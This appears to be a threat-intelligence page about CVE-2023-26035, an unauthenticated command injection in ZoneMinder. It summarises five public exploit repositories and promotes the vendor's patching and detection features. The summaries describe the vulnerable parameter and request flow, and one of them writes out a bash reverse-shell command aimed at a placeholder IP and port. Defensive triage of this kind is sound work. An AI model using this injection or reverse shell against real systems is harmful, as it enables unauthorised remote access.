ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to unauthenticated remote code execution due to missing authorization checks on the snapshot action. The snapshot action expects an id to fetch an existing monitor, but can be passed an object to create a new one. The TriggerOn function subsequently calls shell_exec with the supplied Id, allowing arbitrary command execution without authentication.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
5 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
This repository is a small standalone Python proof-of-concept exploit for CVE-2023-26035, an unauthenticated remote code execution flaw in ZoneMinder snapshot handling. The repository contains only two files: a README with usage notes and exploit.py, which is the sole executable component. The exploit is not part of a larger framework. The exploit workflow is straightforward: it first performs an HTTP GET to the supplied target URL to scrape the __csrf_magic token from the HTML response using BeautifulSoup. It validates the token format against a regex, then sends an HTTP POST to <target_url>/index.php with form parameters view=snapshot and action=create. The command injection occurs in the monitor_ids[0][Id] parameter, where the exploit prepends a semicolon and inserts an attacker-controlled shell command. The payload generation is hardcoded for a bash reverse shell. The script takes three required arguments: target URL, attacker/local IP, and port. It constructs the command 'bash -i >& /dev/tcp/<ip>/<port> 0>&1', base64-encodes it, and wraps it as 'echo <b64> | base64 -d | /bin/bash' before sending it to the target. If successful, the target connects back to the attacker listener, yielding remote shell access. Capabilities: unauthenticated exploitation of a vulnerable web endpoint, CSRF token harvesting, command injection, and reverse shell establishment. There is no post-exploitation framework support, persistence, privilege escalation, or payload customization beyond changing the callback IP/port. Because it includes a working payload but remains simple and hardcoded, the maturity is best classified as OPERATIONAL rather than WEAPONIZED.
This repository contains a single Metasploit module (zoneminder_snapshots.rb) that exploits an unauthenticated command injection vulnerability (CVE-2023-26035) in ZoneMinder versions prior to 1.36.33 and 1.37.33. The exploit targets the 'create monitor ids[]' action in the snapshot view of the ZoneMinder web interface, allowing arbitrary command execution by appending shell commands to a POST request to /zm/index.php. The module supports both direct command execution and staged payloads (such as Meterpreter reverse shells), leveraging Metasploit's CmdStager for flexible payload delivery. The exploit is weaponized, requiring only network access to the vulnerable web interface and no authentication. The code is written in Ruby and is structured as a standard Metasploit exploit module, with options for target URI and payload selection. The main fingerprintable endpoints are the ZoneMinder web path (default /zm/index.php) and the /tmp directory used for payload staging.
This repository provides a proof-of-concept (PoC) exploit for CVE-2023-26035, a vulnerability in ZoneMinder that allows unauthenticated remote command execution via the web interface. The main exploit script, 'exp.js', is a Node.js application that takes a target URI and a shell command as arguments. It first fetches a CSRF token from the target's 'index.php' page, then crafts and sends a POST request to the same endpoint, injecting the provided shell command into the 'monitor_ids[0][Id]' parameter. If successful, the command is executed on the target server. The repository includes a README with setup and usage instructions, and the necessary package files for Node.js dependencies (axios, cheerio, yargs). The exploit is network-based, targeting HTTP endpoints exposed by ZoneMinder, and does not require authentication. The code is a functional PoC, not weaponized, and is intended for testing or research purposes.
This repository contains a proof-of-concept exploit for CVE-2023-26035, an unauthenticated remote code execution vulnerability in ZoneMinder versions prior to 1.36.33 and 1.37.33. The exploit is implemented in Python (exploit.py) and works by abusing the 'snapshot' action in the ZoneMinder web interface, which lacks proper authorization checks. The script first fetches a CSRF token from the target, then sends a crafted POST request to the '/index.php' endpoint with a payload that injects a bash reverse shell command. The payload is base64-encoded and executed on the target, resulting in a reverse shell connection to the attacker's specified IP and port. The repository also includes a README.md with usage instructions and vulnerability details. The exploit requires the attacker to provide the target URL, their own IP, and a listening port. The main attack vector is network-based, targeting the HTTP interface of ZoneMinder. The only fingerprintable endpoint is the '/index.php' path on the target ZoneMinder instance.
This repository is a Python-based proof-of-concept exploit for CVE-2023-26035, targeting ZoneMinder video surveillance software versions prior to 1.36.33 and 1.37.33. The exploit leverages an unauthenticated command injection vulnerability in the 'snapshot' functionality exposed at '/index.php'. The main script (main.py) takes the target URL, attacker's IP, and port as arguments, checks if the target is vulnerable by timing a 'sleep' command, and if so, sends a base64-encoded bash reverse shell payload to the target. The core exploit logic is implemented in 'zoneminder_snapshots.py', which handles HTTP(S) communication, CSRF token extraction, and payload delivery. The exploit requires the attacker to be listening for a reverse shell connection. No hardcoded IPs or domains are present; all network targets are user-supplied. The repository is well-structured, with clear separation between the exploit logic and the command-line interface.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.